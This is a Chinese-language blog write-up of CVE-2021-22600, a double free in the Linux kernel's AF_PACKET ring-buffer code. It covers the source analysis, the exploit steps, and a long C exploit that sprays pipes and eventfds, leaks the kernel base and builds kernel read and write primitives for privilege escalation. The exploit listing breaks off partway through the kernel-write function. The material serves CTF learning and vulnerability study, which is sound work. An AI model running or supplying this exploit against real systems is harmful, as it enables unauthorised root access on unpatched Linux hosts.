CVE-2021-22600 Linux内核提权漏洞分析及其延申利用手法(USMA)研究

0rb1t Lv2

0x00.前言

研究这个CVE的契机是这次2024强网拟态杯的一道内核题,开启内核cg隔离的情况下的0x40堆uaf利用。

当时的想法是先堆喷pipe_buffer,然后利用poll_list释放pipe_buffer,再去打DirtyPipe,可惜在开启了kaslr的环境,很难预测到pipe_buffer的地址,最后只能放弃。

比赛结束后看到其他佬的wp,基本上都是利用user_key_payload泄露内核基地址,再去打usma实现提权。而我却连usma是什么都不知道,故做此文章记录学习过程。

0x01.源码分析

在我看来,读源码是了解漏洞以及利用手法产生原理最有效的方法之一,所以源码分析的内容会偏多一点。

本篇使用的源码版本为linux 5.15.1。

socket

sys_cocket函数先是调用sock_create创建并初始化socket结构体,然后调用sock_map_fd为其绑定文件描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
int __sys_socket(int family, int type, int protocol)
{
int retval;
struct socket *sock;
int flags;

...
retval = sock_create(family, type, protocol, &sock);
if (retval < 0)
return retval;

return sock_map_fd(sock, flags & (O_CLOEXEC | O_NONBLOCK));
}

继续跟进sock_create->__socket_create,可以看到其会优先调用sock_alloc()申请并简单初始化socket结构体,然后根据传入的family选择对应的net_proto_family结构体,再调用pf->create进行操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int __sock_create(struct net *net, int family, int type, int protocol,
struct socket **res, int kern)
{
int err;
struct socket *sock;
const struct net_proto_family *pf;
...
sock = sock_alloc();
if (!sock) {
net_warn_ratelimited("socket: no more sockets\n");
return -ENFILE; /* Not exactly a match, but its the
closest posix thing */
}
sock->type = type;

rcu_read_lock();
//net_families通过sock_register注册
pf = rcu_dereference(net_families[family]);
...
//调用对应family的create函数
err = pf->create(net, sock, protocol, kern);
...
*res = sock;

return 0;
}

根据引用查找可以看到net_families初始化的位置在sock_register,rcu_assign_pointer会在net_families为传入的ops设置一个坑位。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//file: net/socket.c
int sock_register(const struct net_proto_family *ops)
{
int err;

if (ops->family >= NPROTO) {
pr_crit("protocol %d >= NPROTO(%d)\n", ops->family, NPROTO);
return -ENOBUFS;
}

spin_lock(&net_family_lock);
if (rcu_dereference_protected(net_families[ops->family],
lockdep_is_held(&net_family_lock)))
err = -EEXIST;
else {
//调用rcu_assign_pointer把ops置入net_families
rcu_assign_pointer(net_families[ops->family], ops);
err = 0;
}
spin_unlock(&net_family_lock);

pr_info("NET: Registered %s protocol family\n", pf_family_names[ops->family]);
return err;
}

继续查找引用,可以找到packet_init会调用sock_register进行初始化,所以我们可以通过PF_PACKET的family标志调用packet_create函数。

也有其他对的family对应的ops,不过这里我们研究的漏洞产生点位于af_packet.c中,所以选择研究packet_create函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//file: net/packet/af_packet.c
static const struct net_proto_family packet_family_ops = {
.family = PF_PACKET,
.create = packet_create,
.owner = THIS_MODULE,
};
static int __init packet_init(void)
{
int rc;

rc = proto_register(&packet_proto, 0);
if (rc)
goto out;
rc = sock_register(&packet_family_ops);
...
return rc;
}
module_init(packet_init);

packet_create整体就是申请一些结构体并初始化,这里要注意的sock->ops的初始化,后续setsocket会调用这个ops中的函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
//file: net/packet/af_packet.c
static int packet_create(struct net *net, struct socket *sock, int protocol,
int kern)
{
struct sock *sk;
struct packet_sock *po;
__be16 proto = (__force __be16)protocol; /* weird, but documented */
int err;

if (!ns_capable(net->user_ns, CAP_NET_RAW))
return -EPERM;
//type得正确设置
if (sock->type != SOCK_DGRAM && sock->type != SOCK_RAW &&
sock->type != SOCK_PACKET)
return -ESOCKTNOSUPPORT;

sock->state = SS_UNCONNECTED;
err = -ENOBUFS;
//从自己的kmem_cache中申请堆块。
sk = sk_alloc(net, PF_PACKET, GFP_KERNEL, &packet_proto, kern);
if (sk == NULL)
goto out;
//关键点,后续setsocket会调用这个ops中的操作函数
sock->ops = &packet_ops;
//注意设置type,跳过判断
if (sock->type == SOCK_PACKET)
sock->ops = &packet_ops_spkt;
...
return err;
}
static const struct proto_ops packet_ops = {
.family = PF_PACKET,
.owner = THIS_MODULE,
.release = packet_release,
.bind = packet_bind,
.connect = sock_no_connect,
.socketpair = sock_no_socketpair,
.accept = sock_no_accept,
.getname = packet_getname,
.poll = packet_poll,
.ioctl = packet_ioctl,
.gettstamp = sock_gettstamp,
.listen = sock_no_listen,
.shutdown = sock_no_shutdown,
.setsockopt = packet_setsockopt,
.getsockopt = packet_getsockopt,
.sendmsg = packet_sendmsg,
.recvmsg = packet_recvmsg,
.mmap = packet_mmap,
.sendpage = sock_no_sendpage,
};

可以看到socket系统调用整体就是创建和初始化的过程,这也是我们了解漏洞调用链的第一步。

setsockopt

sys_setsockopt会先将传入的fd转化成socket结构体,然后选择性进行setsockopt函数的调用,我们需要调用的是af_packet.c中的函数,所以我们设置level使其调用opt函数指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//file: net/socket.c
int __sys_setsockopt(int fd, int level, int optname, char __user *user_optval,
int optlen)
{
sockptr_t optval = USER_SOCKPTR(user_optval);
char *kernel_optval = NULL;
int err, fput_needed;
struct socket *sock;

if (optlen < 0)
return -EINVAL;
//通过fd寻找socket结构体
sock = sockfd_lookup_light(fd, &err, &fput_needed);
...
//这里会根据情况选择处理函数,我们需要将level置为非SOL_SOCKET而是SOL_PACKET
if (level == SOL_SOCKET && !sock_use_custom_sol_socket(sock))
err = sock_setsockopt(sock, level, optname, optval, optlen);
else if (unlikely(!sock->ops->setsockopt))
err = -EOPNOTSUPP;
else
err = sock->ops->setsockopt(sock, level, optname, optval,
optlen);
...
return err;
}

根据packet_ops中的函数指针找到指定的setsockopt函数,可以看到它会根据设置的optname进行分支选择,而我们要关注的就是PACKET_TX_RING操作,它会调用packet_set_ring函数建立环形缓冲区,类似于pipe_buffer那种。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
//file: net/packet/af_packet.c
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
int ret;

if (level != SOL_PACKET)
return -ENOPROTOOPT;

switch (optname) {
...
case PACKET_RX_RING:
case PACKET_TX_RING:
{
union tpacket_req_u req_u;
int len;

lock_sock(sk);
switch (po->tp_version) {
//这里是版本选择,后续漏洞利用也和这个有关
case TPACKET_V1:
case TPACKET_V2:
//不同版本结构体大小不一样
len = sizeof(req_u.req);
break;
case TPACKET_V3:
default:
len = sizeof(req_u.req3);
break;
}
if (optlen < len) {
ret = -EINVAL;
} else {
//copy_from_user一样
if (copy_from_sockptr(&req_u.req, optval, len))
ret = -EFAULT;
else
//建立环形缓冲区,关键函数
ret = packet_set_ring(sk, &req_u, 0,
optname == PACKET_TX_RING);
}
release_sock(sk);
return ret;
}
...
}

根进packet_set_ring函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
//file: net/packet/af_packet.c
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;
//根据tx_ring选择对应的环形缓冲区,tx_ring为传输区缓冲区,rx_ring为接收区缓冲区
rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
//如果rb正在被其他cpu使用就退出
if (packet_read_pending(rb))
goto out;
}
//req->tp_block_nr表示申请的page数
if (req->tp_block_nr) {
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
//如果已经rb已经有对应的page缓冲区就直接退出了
if (unlikely(rb->pg_vec))
goto out;
//还是基于版本的不同len选择
switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
//每一个块的size要大于0
if (unlikely((int)req->tp_block_size <= 0))
goto out;
//要页对齐
if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
//版本大于v3,每个块的size都要有所预留。
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
//限制块帧范围
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;
//rb->frames_per_block为每个块的块帧数量
rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
//不为0
if (unlikely(rb->frames_per_block == 0))
goto out;
//总共申请的块帧数不能超过UINT_MAX即正整数的最大值,一般都不会超过。
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
//总块帧数要匹配
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
//返回log2(n)
order = get_order(req->tp_block_size);
//page的申请
pg_vec = alloc_pg_vec(req, order);
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) {
//漏洞产生的地方
init_prb_bdqc(po, rb, pg_vec, req_u);
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}

...
//只要closing设置为1,就会清空原有的rb,并设置新的rb
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);//将原先pg_vec取出等待释放
if (po->tp_version <= TPACKET_V2)//当版本小于V2时,会将原先的rx_owner_map取出并释放.
swap(rb->rx_owner_map, rx_owner_map);
...
}
...
//对原先pg_vec和rx_owner_map进行释放,可以发现这里只针对rb->rx_owner_map进行释放,却没有针对rb->prb_bdqc的清空操作。
out_free_pg_vec:
bitmap_free(rx_owner_map);
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr);
out:
return err;
}

跟进alloc_pg_vec函数,可以看到,pg_vec是基于我们控制的block_nr申请的,标志位为GFP_KERNEL,因此我们可以申请得到几乎任意大小的堆块,不过每8个字节会申请一个page,会吃不少内存。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//file: net/packet/af_packet.c
static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)
{
unsigned int block_nr = req->tp_block_nr;
struct pgv *pg_vec;
int i;
//申请任意堆块
pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN);
if (unlikely(!pg_vec))
goto out;
//所有page的虚拟地址都存入pg_vec。
for (i = 0; i < block_nr; i++) {
pg_vec[i].buffer = alloc_one_pg_vec_page(order);
if (unlikely(!pg_vec[i].buffer))
goto out_free_pgvec;
}

out:
return pg_vec;

out_free_pgvec:
free_pg_vec(pg_vec, order, block_nr);
pg_vec = NULL;
goto out;
}

再查看产生漏洞的init_prb_bdqc函数,可以看到pg_vec没有任何防备的传递给了rb->prb_bdqc->pkbdq。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//file: net/packet/af_packet.c

#define GET_PBDQC_FROM_RB(x) ((struct tpacket_kbdq_core *)(&(x)->prb_bdqc))
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec;//pg_vec传给了rb->prb_bdqc->pkbdq
pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
p1->pkblk_start = pg_vec[0].buffer;
p1->kblk_size = req_u->req3.tp_block_size;
p1->knum_blocks = req_u->req3.tp_block_nr;
p1->hdrlen = po->tp_hdrlen;
p1->version = po->tp_version;
p1->last_kactive_blk_num = 0;
...
}

我们再查看rb的结构体,能够发现rx_owner_map和prb_bdqc是一个union体,且prb_bdqc->pg_vec指针的偏移为0,刚好和rx_owner_map指针重合。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
struct packet_ring_buffer {
struct pgv *pg_vec;

unsigned int head;
unsigned int frames_per_block;
unsigned int frame_size;
unsigned int frame_max;

unsigned int pg_vec_order;
unsigned int pg_vec_pages;
unsigned int pg_vec_len;

unsigned int __percpu *pending_refcnt;

union {
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};
struct tpacket_kbdq_core {
struct pgv *pkbdq;
unsigned int feature_req_word;
unsigned int hdrlen;
...
}

综合以上分析,可以看到,漏洞点在于没有对rb->prb_bdqc进行清空操作,以及在释放rx_owner_map没有进行check造成了double free漏洞。

mmap

因为要涉及usma的漏洞利用,所以顺便分析一下mmap系统调用,先推荐个非常详细的mmap分析文章

sys_mmap->do_mmap2->ksys_mmap_pgoff

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
//file: mm/nommu.c
unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
unsigned long prot, unsigned long flags,
unsigned long fd, unsigned long pgoff)
{
struct file *file = NULL;
unsigned long retval = -EBADF;

audit_mmap_fd(fd, flags);
//flags设置成非MAP_ANONYMOUS,保证file操作正常进行
if (!(flags & MAP_ANONYMOUS)) {
file = fget(fd);
if (!file)
goto out;
}

retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);

if (file)
fput(file);
out:
return retval;
}

vm_mmap_pgoff函数调用do_mmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
//file: mm/mmap.c
unsigned long do_mmap(struct file *file, unsigned long addr,
unsigned long len, unsigned long prot,
unsigned long flags, unsigned long pgoff,
unsigned long *populate, struct list_head *uf)
{
struct mm_struct *mm = current->mm;
vm_flags_t vm_flags;
int pkey = 0;

*populate = 0;
...
//flags如果没设置为MAP_FIXED就会动态调整地址,这里就是min(addr,mmap_min_addr)
if (!(flags & MAP_FIXED))
addr = round_hint_to_min(addr);
/* Obtain the address to map to. we verify (or select) it and ensure
* that it represents a valid section of the address space.
*/
//会调用file->f_op->get_unmapped_area或者current->mm->get_unmapped_area来获取未映射的虚拟地址。
addr = get_unmapped_area(file, addr, len, pgoff, flags);
if (IS_ERR_VALUE(addr))
return addr;

//flags为noreplace时,如果发现有vma与申请的区域存在交集就退出
if (flags & MAP_FIXED_NOREPLACE) {
if (find_vma_intersection(mm, addr, addr + len))
return -EEXIST;
}

...

if (file) {
struct inode *inode = file_inode(file);
unsigned long flags_mask;

if (!file_mmap_ok(file, inode, pgoff, len))
return -EOVERFLOW;

flags_mask = LEGACY_MAP_MASK | file->f_op->mmap_supported_flags;

switch (flags & MAP_TYPE) {
...
case MAP_PRIVATE:
if (!(file->f_mode & FMODE_READ))
return -EACCES;
if (path_noexec(&file->f_path)) {
if (vm_flags & VM_EXEC)
return -EPERM;
vm_flags &= ~VM_MAYEXEC;
}
//当为MAP_PRIVATE的时候,会检查f_op->mmap是否存在,后续会调用
if (!file->f_op->mmap)
return -ENODEV;
if (vm_flags & (VM_GROWSDOWN|VM_GROWSUP))
return -EINVAL;
break;

default:
return -EINVAL;
}
...
//调用mmap_region继续分配
addr = mmap_region(file, addr, len, vm_flags, pgoff, uf);
if (!IS_ERR_VALUE(addr) &&
((vm_flags & VM_LOCKED) ||
(flags & (MAP_POPULATE | MAP_NONBLOCK)) == MAP_POPULATE))
*populate = len;
return addr;
}

跟进mmap_region函数,可以看到调用了file->f_op->mmap函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
//file: mm/mmap.c
unsigned long mmap_region(struct file *file, unsigned long addr,
unsigned long len, vm_flags_t vm_flags, unsigned long pgoff,
struct list_head *uf)
{
struct mm_struct *mm = current->mm;
struct vm_area_struct *vma, *prev, *merge;
int error;
struct rb_node **rb_link, *rb_parent;
unsigned long charged = 0;

/* Check against address space limit. */
...

//vma页合并,加了vma虚拟页合并的操作,基于文件物理页的操作还是一样的
vma = vma_merge(mm, prev, addr, addr + len, vm_flags,
NULL, file, pgoff, NULL, NULL_VM_UFFD_CTX);
if (vma)
goto out;

/*
* Determine the object being mapped and call the appropriate
* specific mapper. the address has already been validated, but
* not unmapped, but the maps are removed from the list.
*/
vma = vm_area_alloc(mm);
if (!vma) {
error = -ENOMEM;
goto unacct_error;
}

vma->vm_start = addr;
vma->vm_end = addr + len;
vma->vm_flags = vm_flags;
vma->vm_page_prot = vm_get_page_prot(vm_flags);
vma->vm_pgoff = pgoff;

if (file) {
if (vm_flags & VM_SHARED) {
error = mapping_map_writable(file->f_mapping);
if (error)
goto free_vma;
}
//调用file->f_op->mmap
vma->vm_file = get_file(file);
error = call_mmap(file, vma);
...
}

file->f_op由先前的socket系统调用中的sock_map_fd函数赋予,为socket_file_ops,对应的mmap函数为sock_mmap,可以看到其调用了sock->ops->mmap即packet_mmap。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//file: net/packet/af_packet.c
static const struct file_operations socket_file_ops = {
.owner = THIS_MODULE,
.llseek = no_llseek,
.read_iter = sock_read_iter,
.write_iter = sock_write_iter,
.poll = sock_poll,
.unlocked_ioctl = sock_ioctl,
#ifdef CONFIG_COMPAT
.compat_ioctl = compat_sock_ioctl,
#endif
.mmap = sock_mmap,
.release = sock_close,
.fasync = sock_fasync,
.sendpage = sock_sendpage,
.splice_write = generic_splice_sendpage,
.splice_read = sock_splice_read,
.show_fdinfo = sock_show_fdinfo,
};
static int sock_mmap(struct file *file, struct vm_area_struct *vma)
{
struct socket *sock = file->private_data;

return sock->ops->mmap(file, sock, vma);
}

跟进packet_mmap可以看到关键代码,循环遍历pg_vec,并将page的物理地址与vma绑定。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
//file: net/packet/af_packet.c
static int packet_mmap(struct file *file, struct socket *sock,
struct vm_area_struct *vma)
{
struct sock *sk = sock->sk;
struct packet_sock *po = pkt_sk(sk);
unsigned long size, expected_size;
struct packet_ring_buffer *rb;
unsigned long start;
int err = -EINVAL;
int i;

...
size = vma->vm_end - vma->vm_start;
if (size != expected_size)
goto out;

start = vma->vm_start;
for (rb = &po->rx_ring; rb <= &po->tx_ring; rb++) {
if (rb->pg_vec == NULL)
continue;
//循环遍历pg_vec中所有内核虚拟地址,然后获取其物理地址,再与用户程序的vma绑定,即一个物理地址绑定两个虚拟地址,从而方便内核和用户迅速传输数据
for (i = 0; i < rb->pg_vec_len; i++) {
struct page *page;
void *kaddr = rb->pg_vec[i].buffer;
int pg_num;

for (pg_num = 0; pg_num < rb->pg_vec_pages; pg_num++) {
page = pgv_to_page(kaddr);
err = vm_insert_page(vma, start, page);
if (unlikely(err))
goto out;
start += PAGE_SIZE;
kaddr += PAGE_SIZE;
}
}
}

atomic_inc(&po->mapped);
vma->vm_ops = &packet_mmap_ops;
err = 0;

out:
mutex_unlock(&po->pg_vec_lock);
return err;
}

由上面的分析可以知道,mmap可以映射socket的环形缓冲区,并且过程是基于pg_vec的,而pg_vec是直接通过GPF_KERNEL堆块申请的,故如果我们可以利用堆块漏洞控制pg_vec,即可实现对任意内核地址的映射和控制。

0x02.漏洞原理

通过对setsocket系统调用的linux源码可以知道,漏洞点位于packet_set_ring函数,在V3版本创建环形缓冲区后,会将缓冲区结构体pg_vec存入rb->prb_bdqc结构体中,并在结尾未做清空操作就直接free了pg_vec。

而转化成V2版本时,rb->rx_owner_map刚好和rb->prb_bdqcs是union类型,类型转换并未做清空处理,导致先前V3残留的pg_vec指针变成了V2的rx_owner_map指针,并且在最后会调用bitmap_free释放该指针,从而造成double free。

0x03.漏洞利用

Step.1

调用socket系统调用创建family为AF_PACKET,type为SOCK_RAW的socket套接字。

Step.2

调用V3版本的setsockopt,设置req->tp_block_nr等参数,创建环形缓冲区。

Step.3

二次调用V3版本的setsockopt,设置req->tp_block_nr参数为0,从而释放原有的缓冲区。

Step.4

堆喷结构体,申请回pg_vec的堆块。

Step.5

调用V2版本的setsockopt,实现double free。

0x04.EXP

exploit.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
#define _GNU_SOURCE
#include "exploit.h"
#include <assert.h>
#include <fcntl.h>
#include <linux/if_packet.h>
#include <sched.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int fpair[2];

static void setup_sandbox() {
unshare(CLONE_NEWNET | CLONE_NEWUSER);
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
CHECK(sched_setaffinity(getpid(), sizeof(set), &set) < 0);
}

static void close_prev_fds() {
for (int i = 3; i < 0x9000; ++i) {
if (i != fpair[1])
close(i);
}
}

static void setpipe_sz(struct pipe_rw *p, unsigned int size) {
CHECK(fcntl(p->w, F_SETPIPE_SZ, size));
}

struct pipe_rw *alloc_pipes(exploit_ctx *ctx, int n, bool init_pipes) {
int fd_pair[2];
struct pipe_rw *pipes;

ctx->pipe_data = ctx->pipe_data ? ctx->pipe_data : calloc(1, 0x5000);
pipes = calloc(n, sizeof(*pipes));

for (int i = 0; i < n; ++i) {
CHECK(pipe(fd_pair));
pipes[i].r = fd_pair[0];
pipes[i].w = fd_pair[1];
setpipe_sz(&pipes[i], pipesz(256));
}

if (!init_pipes)
goto pipe_alloc_ret;

for (int i = 0; i < n; ++i) {
if (i < (n - 0x30)) {
CHECK(write(pipes[i].w, ctx->pipe_data, 0x2002));
}
CHECK(write(pipes[i].w, ctx->pipe_data, 2));
}

pipe_alloc_ret:
return pipes;
}

static void release_pipe(struct pipe_rw *p) {
close(p->r);
close(p->w);
}

static int fionread(int fd) {
int len = -1;
while (ioctl(fd, FIONREAD, &len) < 0)
usleep(1000);
return len;
}

static void release_dup_page(exploit_ctx *ctx, struct pipe_rw *p,
struct pipe_rw *q) {
char tmp[0x100];
setpipe_sz(q, pipesz(256));
read(p->r, tmp, 0x100 - 8);
ctx->corrupt = q;
}

static void eventfd_reclaim(exploit_ctx *ctx) {
for (int i = 0; i < NUM_EVFD; ++i)
ctx->evfds[i] = CHECK(eventfd(0x13370000 + i, 0));
CHECK(read(ctx->corrupt->r, ctx->pipe_data, 0x1000)); // Release page
CHECK_V(read(ctx->corrupt->r, ctx->pipe_data, 0x78), 0x78);

if ((ctx->pipe_data_qw[2] >> 0x10) != 0x1337) {
puts("[-] Exploit Failed. Retrying...");
int pid = fork();
if (!pid) {
exploit(); // Can be improved, but seems to be very stable
exit(0);
}
wait(NULL);
exit(0);
}

ctx->eventfd_idx = ctx->pipe_data_qw[2] - 0x13370000;
ctx->page_addr = ctx->pipe_data_qw[1] - 0x8LL;
ctx->page_offset = ctx->page_addr & ~(0x3fffffff);
printf("[+] Page addr: %#lx\n", ctx->page_addr);
printf("[+] Page offset: %#lx\n", ctx->page_offset);
}

static void realloc_page(exploit_ctx *ctx) {
ctx->pipes = alloc_pipes(ctx, 160, false);

for (int i = 0; i < 32; ++i)
close(ctx->evfds[ctx->eventfd_idx + i]);
for (int i = 0; i < 160; ++i)
setpipe_sz(&ctx->pipes[i], 0x1000);
for (int i = 0; i < 160; ++i)
write(ctx->pipes[i].w, ctx->pipe_data, 3);

CHECK_V(read(ctx->corrupt->r, ctx->pipe_data, 0x78), 0x78);

ctx->pbuf_ops = ctx->pbuf->ops;
ctx->tmp_page = ctx->pbuf->page;
ctx->vmemmap_base = (ctx->pbuf->page & ~(0xfffffffULL));
ctx->kbase = ctx->pbuf_ops - PBUF_OPS_OFF;

printf("[+] Anon pipe buf ops: %#lx\n", ctx->pbuf_ops);
printf("[+] Kbase: %#lx\n", ctx->kbase);
printf("[+] Temporary page from pipe buffer: %#lx\n", ctx->tmp_page);
printf("[+] VMEMMAP base: %#lx\n", ctx->vmemmap_base);
}

uint64_t virt_to_phys(exploit_ctx *ctx, unsigned long x) {
unsigned long y = x - __START_KERNEL_map;
assert(x < y);

return x - ctx->page_offset;
}

#define __pfn_to_page(pfn) (ctx->vmemmap_base + (pfn))

static struct pipe_rw *find_pipe_sz(exploit_ctx *ctx, size_t len) {
for (int i = 0; i < 160; ++i)
if (fionread(ctx->pipes[i].r) == len)
return &ctx->pipes[i];
assert(0);
}

static void setup_rw(exploit_ctx *ctx) {
struct pipe_buffer *corrupting_buf = calloc(2, 0x40);
struct pipe_buffer *corrupt_buf =
(struct pipe_buffer *)((char *)corrupting_buf + 0x40);

corrupting_buf->page =
__pfn_to_page((virt_to_phys(ctx, ctx->page_addr) >> 12) * 0x40);

corrupting_buf->ops = ctx->pbuf_ops;
corrupting_buf->offset = 0x100;

write(ctx->corrupt->w, corrupting_buf, 0x40);
struct pipe_rw *corrupting_pipe = find_pipe_sz(ctx, corrupting_buf->len);

corrupt_buf->page = ctx->tmp_page;
corrupt_buf->len = 0xbad;
corrupt_buf->ops = ctx->pbuf_ops;

corrupting_buf->len = -0x80;

CHECK_V(write(corrupting_pipe->w, (void *)corrupting_buf, 0x80), 0x80);
struct pipe_rw *corrupt_pipe = find_pipe_sz(ctx, corrupt_buf->len);

ctx->corrupt = corrupt_pipe;
ctx->corrupt_buf = corrupt_buf;
ctx->corrupting = corrupting_pipe;
ctx->corrupting_buf = corrupting_buf;
}

static void kread(exploit_ctx *ctx, uint64_t kaddr, char *uaddr,
unsigned int len, enum ktype kreg) {

kaddr = (kreg == KHEAP)
? kaddr
: (ctx->page_offset + ctx->kvoff + kaddr - ctx->kbase);
ctx->corrupt_buf->page =
__pfn_to_page((virt_to_phys(ctx, kaddr) >> 12) * 0x40);
ctx->corrupt_buf->offset = (unsigned int)(kaddr & 0xfffLL);
ctx->corrupt_buf->len = 0x1000 - ctx->corrupt_buf->offset;

CHECK_V(write(ctx->corrupting->w, (void *)ctx->corrupting_buf, 0x80), 0x80);
CHECK_V(read(ctx->corrupt->r, uaddr, len), len);
}

static void kwrite(exploit_ctx *ctx, uint64_t kaddr, char *uaddr,
unsigned int len, enum ktype kreg) {
kaddr = (kreg == KHEAP)
? kaddr
: (ctx->page_offset + ctx->kvoff + kaddr - ctx->kbase);
ctx->corrupt_buf->page =
